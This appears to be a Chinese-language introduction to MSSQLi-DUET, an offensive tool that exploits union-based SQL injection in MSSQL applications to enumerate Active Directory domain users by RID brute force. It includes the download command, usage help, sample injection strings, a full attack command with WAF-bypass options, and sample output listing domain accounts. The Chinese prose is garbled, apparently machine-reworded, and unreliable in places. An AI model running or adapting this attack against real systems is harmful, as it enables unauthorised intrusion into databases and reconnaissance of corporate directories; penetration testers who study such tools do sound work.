MSSQLi

MSSQLi-DUET

MSSQLi-DUET是一款对于MSSQL数据库查询的SQL引入脚本制作，它可以运用RID工程爆破技术性来从一个活动目录自然环境中获取出域客户信息。该专用工具适用各种各样Web运用服务器防火墙绕开技术性，而且完成了SQLMap Temper作用。此外，众多科学研究工作人员还能够依据自身的要求及其总体目标自然环境来独立应用在其中的Temper作用。

该专用工具有二种应用方法，一种是立即以Python脚本制作的方法在cmd终端设备中应用，另一种便是以Burp Suite软件的方式应用，这类方式 能够应用简易的GUI导航栏。

当今版本号的MSSQLi-DUET仅适用根据Union的引入方法，以后大家会开展很多检测来确保别的引入技术性的可靠性和精确性。

专用工具免费下载

众多科学研究工作人员能够应用以下指令将MSSQLi-DUET新项目源代码复制至当地：

git clone https://github.com/Keramas/mssqli-duet.git

专用工具应用

Burp Suite软件应用

在将软件提交至Burp Suite中以后，鼠标右键点一下一个要求，随后挑选将其发给MSSQLi-DUET。接着，大量的有关主要参数和详细资料都将显示信息给客户

要求可能添充要求对话框，点一下运作輸出以后，大家就可以立即查询到輸出結果了：

Python脚本制作应用

脚本制作协助信息内容：

python3 mssqli-duet.py -h

usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid

                      RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]

                      [-o OUTFILE] -r REQUEST_FILE




MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool




optional arguments:

  -h, --help            show this help message and exit

  -i INJECTION, --injection INJECTION

                        Injection point. Provide only the data needed to

                        escape the query.

  -e ENCODING, --encoding ENCODING

                        Type of encoding: unicode, doubleencode, unmagicquotes

  -t TIME_DELAY, --time_delay TIME_DELAY

                        Time delay for requests.

  -rid RID_RANGE, --rid_range RID_RANGE

                        Hypenated range of RIDs to bruteforce. Ex: 1000-1200

  -ssl SSL, --ssl SSL   Add flag for HTTPS

  -p PARAMETER, --parameter PARAMETER

                        Vulnerable parameter

  -proxy PROXY, --proxy PROXY

                        Proxy connection string. Ex: 127.0.0.1:8080

  -o OUTFILE, --outfile OUTFILE

                        Outfile for username enumeration results.

  -r REQUEST_FILE, --request_file REQUEST_FILE

                        Raw request file saved from Burp




Prepare to be enumerated!

怎么使用？

如果你在一个总体目标程序运行中取得成功鉴别出了一个根据Uion引入的引入点，你也就能够立即应用Burp Suite的“copy to file”作用来获得到要求数据库了。

应用-r选择项将储存的要求信息内容发给MSSQLi-DUET，并特定系统漏洞主要参数和引入点信息内容。例如，假如系统漏洞主要参数为“element”，引入种类为SQL引入，那麼-p变量值便是“element”，MSSQLi-DUET可能全自动搭建SQL引入查寻。演试样比如下：

Ex: test'

    test'))

    test")"

专用工具应用示例

python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080

[ ] Collected request data:

Target URL = http://192.168.11.22/search2.php?element=carbon

Method = GET

Content-Type = applcation/x-www-form-urlencoded







[ ] Determining the number of columns in the table...

        [!] Number of columns is  3

[ ] Determining column type...

        [!] Column type is null

[ ] Discovering domain name...

        [ ] Domain = NEUTRINO

[ ] Discovering domain SID...

S-1-5-21-4142252318-1896537706-4233180933-




[ ] Enumerating Active Directory via SIDs...




NEUTRINO\HYDROGENDC01$

NEUTRINO\DnsAdmins

NEUTRINO\DnsUpdateProxy

NEUTRINO\HELIUM$

NEUTRINO\BORON$

NEUTRINO\BERYLLIUM$

NEUTRINO\aeinstein

NEUTRINO\bbobberson

NEUTRINO\csagan

NEUTRINO\ccheese

NEUTRINO\svc_web

NEUTRINO\svc_sql

常见问题

在大家的应用全过程中，很有可能必须科学研究工作人员依据总体目标数据库查询的列种类及其别的限定来对脚本制作编码开展自定改动。

新项目详细地址

MSSQLi-DUET：【GitHub传送器】